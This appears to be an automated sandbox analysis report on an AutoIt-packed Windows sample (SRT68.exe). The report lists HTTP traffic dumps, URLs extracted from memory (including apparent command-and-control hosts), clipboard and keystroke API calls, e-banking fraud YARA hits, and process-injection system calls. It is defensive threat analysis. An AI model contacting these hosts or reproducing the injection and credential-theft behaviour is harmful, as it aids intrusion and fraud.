                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 08:46:54 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66927002-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 08:47:01 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 64 61 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 5b 8f db c6 15 7e f7 af 18 ab c0 4a b2 45 32 9b 14 81 ed 95 b4 4d e2 f4 29 97 02 eb b4 28 36 1b 61 44 8d 24 5a 14 a9 92 d4 ae 65 7b 81 c4 4e 9a 04 31 62 34 0d 50 20 68 d0 1b 8a 3e 15 58 5f b6 d9 f8 b2 f9 0b e4 3f ea 77 ce 90 14 a5 95 e4 4b 9c a2 02 76 45 cd e5 cc 99 73 f9 ce 39 33 ac 9f ee f8 76 34 19 29 d1 8f 86 6e b3 4e ff 85 ed ca 30 6c 94 9c b0 25 3b 72 14 39 bb aa 24 5c e9 f5 1a a5 60 5c c2 18 25 3b cd fa 50 45 52 d8 7d 19 84 2a 6a 94 de bb f4 4b e3 1c fa b8 d5 93 43 d5 28 8d 64 30 70 bc 5e 49 d8 be 17 29 0f 83 02 d5 0b c6 46 00 9a b3 23 77 1d b5 37 f2 83 a8 30 74 cf e9 44 fd 46 47 ed 3a b6 32 f8 47 cd f1 9c c8 91 ae 11 da d2 55 8d 75 90 88 9c c8 55 cd bd bd 3d b3 2b bd 48 86 91 63 4b b3 e3 f4 9c 48 ba 75 4b f7 d6 5d c7 1b 88 40 b9 8d 52 18 4d 5c 15 f6 95 c2 42 43 d5 71 64 a3 24 5d b7 24 fa 81 ea e6 ec 32 7b 86 1c 47 be 69 87 21 16 99 ce 77 b0 91 6c 74 57 82 33 df 33 f1 6f 73 bd 24 48 82 10 d8 50 f6 94 75 c5 e0 81 cd 7a 68 07 ce 28 6a 5a 67 ea a7 b7 df b8 f8 da a5 d7 b6 cf 58 a7 f6 1c af e3 ef 99 51 20 ed c1 16 0f 78 cb 97 1d d1 10 dd b1 67 47 8e ef 55 aa d7 f6 37 4e 59 67 76 76 9a 67 ac ba 95 12 49 89 09 df 73 31 bc 51 5a 4c a6 52 b6 86 d2 73 ba 2a 8c cc cb 61 b9 5a c2 78 15 04 7e f0 94 13 6a 62 1d 73 c2 c0 6e 94 8a 84 a0 97 4c cf e3 a8 cb 7a 7e 66 be c8 68 a0 3a 92 48 f8 d4 bc cd 4f 2a f2 37 d7 b7 8a 47 4b 5b 6c db ef 4c 32 db 6e 1b 23 e8 4a e8 af 16 a9 af 95 da 2b b7 b1 e5 4e 9f 5a ed 5e cb 75 7a fd 08 f6 40 b4 54 50 a4 c3 83 5b ad b4 83 48 ce b4 68 ea a9 d5 77 9c dd a5 53 0d cf 8f 88 a5 48 5d c1 42 f1 d7 f1 71 fc 28 3e 8c 1f 8b f8 bb f8 20 f9 10 8f f7 e2 a3 e4 a3 e4 06 9e 8f f0 77 1c df 8d 0f a8 fb ee 9a d7 0e 47 1b 75 f8 a3 f6 dc b6 41 56 9b d9 6a 3f 8a 46 e1 05 cb 82 fb 99 70 60 ed 0c 9e df f5 5d d7 df 13 9e ef 8f 14 ac 04 0f f0 03 58 8b 0a 60 cf 32 e8 91 5b b7 da f0 fb 01 98 f9 2b ad 6e 26 1f 26 37 eb 96 6c d6 2d ec a3 59 9f db 4c 4f b5 5a a9 af 1b 7b 81 1c 8d 40 34 15 f0 7c 7b 8b 7d b1 05 5f 00 30 2c 1d c4 6a e9 fb f0 6b af 67 84 91 84 7f 43 01 73 ab ce c8 da 48 d7 27 3d ad 4f a5 31 a7 11 83 a1 a1 b4 14 39 fa eb cd fa 68 f9 ec 8e d2 76 0c 67 7d 76 6d d5 db 41 33 3e d2 0a 8b 7f 20 4d c6 3f b0 76 1f 9c d0 e7 8c d0 47 cb 36 de 1e 47 91 ef 85 99 c4 b1 f3 82 19 e8 4e 70 a9 1f a0 06 d7 0f 5a ac 67 e5 d9 64 6c 69 47 e8 5c 55 2d 58 c0 50 ba ac 8e 54 aa f9 fc 5c 82 e9 78 56 0d 70 b9 40 62 24 3b 1d 28 aa e5 92 ed cc db 1e 81 b4 b6 3f 6b af ef 3b a1 b5 69 f7 95 3d 68 ac 75 38 58 2c c6 f0 35 39 1c 6d 60 56 2b f4 c7 81 ad 1a 19 13 84 ce a5 e6 6f 88 0e 59 a3 28 ee 98 9c a7 b8 03 86 ef 82 4f ae de 51 c7 1f 4a 27 07 f9 cc 71 0a cc eb 01 96 a7 f6 ac cd 71 34 cc 38 5b c2 3f 8d a0 48 33 1e 66 bc af 51 93 8d 7d 49 a7 e7 35 42 08 cb eb b4 40 6d f5 56 e3 bf c3 38 fe 13 1f 8a e4 93 f8 38 f9 34 b9 29 e2 fb 19 3a 9c 2e 38 64 38 9
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 08:47:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 64 61 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 5b 8f db c6 15 7e f7 af 18 ab c0 4a b2 45 32 9b 14 81 ed 95 b4 4d e2 f4 29 97 02 eb b4 28 36 1b 61 44 8d 24 5a 14 a9 92 d4 ae 65 7b 81 c4 4e 9a 04 31 62 34 0d 50 20 68 d0 1b 8a 3e 15 58 5f b6 d9 f8 b2 f9 0b e4 3f ea 77 ce 90 14 a5 95 e4 4b 9c a2 02 76 45 cd e5 cc 99 73 f9 ce 39 33 ac 9f ee f8 76 34 19 29 d1 8f 86 6e b3 4e ff 85 ed ca 30 6c 94 9c b0 25 3b 72 14 39 bb aa 24 5c e9 f5 1a a5 60 5c c2 18 25 3b cd fa 50 45 52 d8 7d 19 84 2a 6a 94 de bb f4 4b e3 1c fa b8 d5 93 43 d5 28 8d 64 30 70 bc 5e 49 d8 be 17 29 0f 83 02 d5 0b c6 46 00 9a b3 23 77 1d b5 37 f2 83 a8 30 74 cf e9 44 fd 46 47 ed 3a b6 32 f8 47 cd f1 9c c8 91 ae 11 da d2 55 8d 75 90 88 9c c8 55 cd bd bd 3d b3 2b bd 48 86 91 63 4b b3 e3 f4 9c 48 ba 75 4b f7 d6 5d c7 1b 88 40 b9 8d 52 18 4d 5c 15 f6 95 c2 42 43 d5 71 64 a3 24 5d b7 24 fa 81 ea e6 ec 32 7b 86 1c 47 be 69 87 21 16 99 ce 77 b0 91 6c 74 57 82 33 df 33 f1 6f 73 bd 24 48 82 10 d8 50 f6 94 75 c5 e0 81 cd 7a 68 07 ce 28 6a 5a 67 ea a7 b7 df b8 f8 da a5 d7 b6 cf 58 a7 f6 1c af e3 ef 99 51 20 ed c1 16 0f 78 cb 97 1d d1 10 dd b1 67 47 8e ef 55 aa d7 f6 37 4e 59 67 76 76 9a 67 ac ba 95 12 49 89 09 df 73 31 bc 51 5a 4c a6 52 b6 86 d2 73 ba 2a 8c cc cb 61 b9 5a c2 78 15 04 7e f0 94 13 6a 62 1d 73 c2 c0 6e 94 8a 84 a0 97 4c cf e3 a8 cb 7a 7e 66 be c8 68 a0 3a 92 48 f8 d4 bc cd 4f 2a f2 37 d7 b7 8a 47 4b 5b 6c db ef 4c 32 db 6e 1b 23 e8 4a e8 af 16 a9 af 95 da 2b b7 b1 e5 4e 9f 5a ed 5e cb 75 7a fd 08 f6 40 b4 54 50 a4 c3 83 5b ad b4 83 48 ce b4 68 ea a9 d5 77 9c dd a5 53 0d cf 8f 88 a5 48 5d c1 42 f1 d7 f1 71 fc 28 3e 8c 1f 8b f8 bb f8 20 f9 10 8f f7 e2 a3 e4 a3 e4 06 9e 8f f0 77 1c df 8d 0f a8 fb ee 9a d7 0e 47 1b 75 f8 a3 f6 dc b6 41 56 9b d9 6a 3f 8a 46 e1 05 cb 82 fb 99 70 60 ed 0c 9e df f5 5d d7 df 13 9e ef 8f 14 ac 04 0f f0 03 58 8b 0a 60 cf 32 e8 91 5b b7 da f0 fb 01 98 f9 2b ad 6e 26 1f 26 37 eb 96 6c d6 2d ec a3 59 9f db 4c 4f b5 5a a9 af 1b 7b 81 1c 8d 40 34 15 f0 7c 7b 8b 7d b1 05 5f 00 30 2c 1d c4 6a e9 fb f0 6b af 67 84 91 84 7f 43 01 73 ab ce c8 da 48 d7 27 3d ad 4f a5 31 a7 11 83 a1 a1 b4 14 39 fa eb cd fa 68 f9 ec 8e d2 76 0c 67 7d 76 6d d5 db 41 33 3e d2 0a 8b 7f 20 4d c6 3f b0 76 1f 9c d0 e7 8c d0 47 cb 36 de 1e 47 91 ef 85 99 c4 b1 f3 82 19 e8 4e 70 a9 1f a0 06 d7 0f 5a ac 67 e5 d9 64 6c 69 47 e8 5c 55 2d 58 c0 50 ba ac 8e 54 aa f9 fc 5c 82 e9 78 56 0d 70 b9 40 62 24 3b 1d 28 aa e5 92 ed cc db 1e 81 b4 b6 3f 6b af ef 3b a1 b5 69 f7 95 3d 68 ac 75 38 58 2c c6 f0 35 39 1c 6d 60 56 2b f4 c7 81 ad 1a 19 13 84 ce a5 e6 6f 88 0e 59 a3 28 ee 98 9c a7 b8 03 86 ef 82 4f ae de 51 c7 1f 4a 27 07 f9 cc 71 0a cc eb 01 96 a7 f6 ac cd 71 34 cc 38 5b c2 3f 8d a0 48 33 1e 66 bc af 51 93 8d 7d 49 a7 e7 35 42 08 cb eb b4 40 6d f5 56 e3 bf c3 38 fe 13 1f 8a e4 93 f8 38 f9 34 b9 29 e2 fb 19 3a 9c 2e 38 64 38 9
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 08:47:07 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 64 61 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 5b 8f db c6 15 7e f7 af 18 ab c0 4a b2 45 32 9b 14 81 ed 95 b4 4d e2 f4 29 97 02 eb b4 28 36 1b 61 44 8d 24 5a 14 a9 92 d4 ae 65 7b 81 c4 4e 9a 04 31 62 34 0d 50 20 68 d0 1b 8a 3e 15 58 5f b6 d9 f8 b2 f9 0b e4 3f ea 77 ce 90 14 a5 95 e4 4b 9c a2 02 76 45 cd e5 cc 99 73 f9 ce 39 33 ac 9f ee f8 76 34 19 29 d1 8f 86 6e b3 4e ff 85 ed ca 30 6c 94 9c b0 25 3b 72 14 39 bb aa 24 5c e9 f5 1a a5 60 5c c2 18 25 3b cd fa 50 45 52 d8 7d 19 84 2a 6a 94 de bb f4 4b e3 1c fa b8 d5 93 43 d5 28 8d 64 30 70 bc 5e 49 d8 be 17 29 0f 83 02 d5 0b c6 46 00 9a b3 23 77 1d b5 37 f2 83 a8 30 74 cf e9 44 fd 46 47 ed 3a b6 32 f8 47 cd f1 9c c8 91 ae 11 da d2 55 8d 75 90 88 9c c8 55 cd bd bd 3d b3 2b bd 48 86 91 63 4b b3 e3 f4 9c 48 ba 75 4b f7 d6 5d c7 1b 88 40 b9 8d 52 18 4d 5c 15 f6 95 c2 42 43 d5 71 64 a3 24 5d b7 24 fa 81 ea e6 ec 32 7b 86 1c 47 be 69 87 21 16 99 ce 77 b0 91 6c 74 57 82 33 df 33 f1 6f 73 bd 24 48 82 10 d8 50 f6 94 75 c5 e0 81 cd 7a 68 07 ce 28 6a 5a 67 ea a7 b7 df b8 f8 da a5 d7 b6 cf 58 a7 f6 1c af e3 ef 99 51 20 ed c1 16 0f 78 cb 97 1d d1 10 dd b1 67 47 8e ef 55 aa d7 f6 37 4e 59 67 76 76 9a 67 ac ba 95 12 49 89 09 df 73 31 bc 51 5a 4c a6 52 b6 86 d2 73 ba 2a 8c cc cb 61 b9 5a c2 78 15 04 7e f0 94 13 6a 62 1d 73 c2 c0 6e 94 8a 84 a0 97 4c cf e3 a8 cb 7a 7e 66 be c8 68 a0 3a 92 48 f8 d4 bc cd 4f 2a f2 37 d7 b7 8a 47 4b 5b 6c db ef 4c 32 db 6e 1b 23 e8 4a e8 af 16 a9 af 95 da 2b b7 b1 e5 4e 9f 5a ed 5e cb 75 7a fd 08 f6 40 b4 54 50 a4 c3 83 5b ad b4 83 48 ce b4 68 ea a9 d5 77 9c dd a5 53 0d cf 8f 88 a5 48 5d c1 42 f1 d7 f1 71 fc 28 3e 8c 1f 8b f8 bb f8 20 f9 10 8f f7 e2 a3 e4 a3 e4 06 9e 8f f0 77 1c df 8d 0f a8 fb ee 9a d7 0e 47 1b 75 f8 a3 f6 dc b6 41 56 9b d9 6a 3f 8a 46 e1 05 cb 82 fb 99 70 60 ed 0c 9e df f5 5d d7 df 13 9e ef 8f 14 ac 04 0f f0 03 58 8b 0a 60 cf 32 e8 91 5b b7 da f0 fb 01 98 f9 2b ad 6e 26 1f 26 37 eb 96 6c d6 2d ec a3 59 9f db 4c 4f b5 5a a9 af 1b 7b 81 1c 8d 40 34 15 f0 7c 7b 8b 7d b1 05 5f 00 30 2c 1d c4 6a e9 fb f0 6b af 67 84 91 84 7f 43 01 73 ab ce c8 da 48 d7 27 3d ad 4f a5 31 a7 11 83 a1 a1 b4 14 39 fa eb cd fa 68 f9 ec 8e d2 76 0c 67 7d 76 6d d5 db 41 33 3e d2 0a 8b 7f 20 4d c6 3f b0 76 1f 9c d0 e7 8c d0 47 cb 36 de 1e 47 91 ef 85 99 c4 b1 f3 82 19 e8 4e 70 a9 1f a0 06 d7 0f 5a ac 67 e5 d9 64 6c 69 47 e8 5c 55 2d 58 c0 50 ba ac 8e 54 aa f9 fc 5c 82 e9 78 56 0d 70 b9 40 62 24 3b 1d 28 aa e5 92 ed cc db 1e 81 b4 b6 3f 6b af ef 3b a1 b5 69 f7 95 3d 68 ac 75 38 58 2c c6 f0 35 39 1c 6d 60 56 2b f4 c7 81 ad 1a 19 13 84 ce a5 e6 6f 88 0e 59 a3 28 ee 98 9c a7 b8 03 86 ef 82 4f ae de 51 c7 1f 4a 27 07 f9 cc 71 0a cc eb 01 96 a7 f6 ac cd 71 34 cc 38 5b c2 3f 8d a0 48 33 1e 66 bc af 51 93 8d 7d 49 a7 e7 35 42 08 cb eb b4 40 6d f5 56 e3 bf c3 38 fe 13 1f 8a e4 93 f8 38 f9 34 b9 29 e2 fb 19 3a 9c 2e 38 64 38 9
                Source: odbcconf.exe, 00000004.00000002.3836668787.0000000006646000.00000004.10000000.00040000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3838981158.0000000007C50000.00000004.00000800.00020000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://expired.ru
                Source: odbcconf.exe, 00000004.00000002.3836668787.0000000006646000.00000004.10000000.00040000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3838981158.0000000007C50000.00000004.00000800.00020000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://vpnto.net
                Source: odbcconf.exe, 00000004.00000002.3838981158.0000000007C50000.00000004.00000800.00020000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.00000000042DA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.amayavp.xyz/pxvi/?dpy4vDKP=yLx6IXsyZhSq7U6uqCPnr6ME
                Source: VdxisCThGA.exe, 00000006.00000002.3837691374.0000000005242000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.fantastica.digital
                Source: VdxisCThGA.exe, 00000006.00000002.3837691374.0000000005242000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.fantastica.digital/5srj/
                Source: odbcconf.exe, 00000004.00000002.3836668787.0000000006646000.00000004.10000000.00040000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3838981158.0000000007C50000.00000004.00000800.00020000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.i7.ru/
                Source: odbcconf.exe, 00000004.00000003.1689442718.0000000007F2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: odbcconf.exe, 00000004.00000003.1689442718.0000000007F2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: odbcconf.exe, 00000004.00000003.1689442718.0000000007F2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: odbcconf.exe, 00000004.00000003.1689442718.0000000007F2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: odbcconf.exe, 00000004.00000003.1689442718.0000000007F2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: odbcconf.exe, 00000004.00000003.1689442718.0000000007F2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: odbcconf.exe, 00000004.00000003.1689442718.0000000007F2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://expired.ru
                Source: VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://i7.ru
                Source: odbcconf.exe, 00000004.00000002.3836668787.0000000006646000.00000004.10000000.00040000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3838981158.0000000007C50000.00000004.00000800.00020000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://i7.ru/domains/
                Source: odbcconf.exe, 00000004.00000002.3836668787.0000000006646000.00000004.10000000.00040000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3838981158.0000000007C50000.00000004.00000800.00020000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://i7.ru/domains/#domreg
                Source: odbcconf.exe, 00000004.00000002.3836668787.0000000006646000.00000004.10000000.00040000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3838981158.0000000007C50000.00000004.00000800.00020000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ipaddress.ru
                Source: VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://job.i7.ru
                Source: odbcconf.exe, 00000004.00000002.3834317306.0000000003257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: odbcconf.exe, 00000004.00000002.3834317306.0000000003257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: odbcconf.exe, 00000004.00000003.1684020923.0000000007F07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: odbcconf.exe, 00000004.00000002.3834317306.0000000003257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: odbcconf.exe, 00000004.00000002.3834317306.000000000322F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: odbcconf.exe, 00000004.00000002.3834317306.0000000003257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: odbcconf.exe, 00000004.00000002.3834317306.000000000322F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://myssl.ru
                Source: odbcconf.exe, 00000004.00000002.3836668787.0000000006646000.00000004.10000000.00040000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3838981158.0000000007C50000.00000004.00000800.00020000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://proxyspot.com
                Source: odbcconf.exe, 00000004.00000002.3836668787.0000000006646000.00000004.10000000.00040000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3838981158.0000000007C50000.00000004.00000800.00020000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://whois7.ru
                Source: odbcconf.exe, 00000004.00000002.3836668787.0000000006646000.00000004.10000000.00040000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3838981158.0000000007C50000.00000004.00000800.00020000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://whois7.ru/?q=vpnto.net
                Source: odbcconf.exe, 00000004.00000002.3836668787.00000000059B6000.00000004.10000000.00040000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003326000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.bfyer.com?id=84562
                Source: odbcconf.exe, 00000004.00000003.1689442718.0000000007F2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: odbcconf.exe, 00000004.00000002.3836668787.00000000064B4000.00000004.10000000.00040000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003E24000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: odbcconf.exe, 00000004.00000003.1689442718.0000000007F2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_01014164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_01014164
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_01014164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_01014164
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_01013F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_01013F66
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_0100001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0100001C
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_0102CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0102CABC

                E-Banking Fraud

                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.3834195003.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3833825431.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3835727980.0000000003590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1489414299.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1488635297.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3835430269.0000000004BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1489460916.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Users\user\Desktop\SRT68.exeCode function: This is a third-party compiled AutoIt script.0_2_00FA3B3A
                Source: SRT68.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: SRT68.exe, 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_76896b17-1
                Source: SRT68.exe, 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_23dfe4e6-5
                Source: SRT68.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_34ed5190-b
                Source: SRT68.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_f25c968a-3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C593 NtClose,2_2_0042C593
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772B60 NtClose,LdrInitializeThunk,2_2_03772B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03772DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03772C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037735C0 NtCreateMutant,LdrInitializeThunk,2_2_037735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03774340 NtSetContextThread,2_2_03774340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03774650 NtSuspendThread,2_2_03774650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BF0 NtAllocateVirtualMemory,2_2_03772BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BE0 NtQueryValueKey,2_2_03772BE0
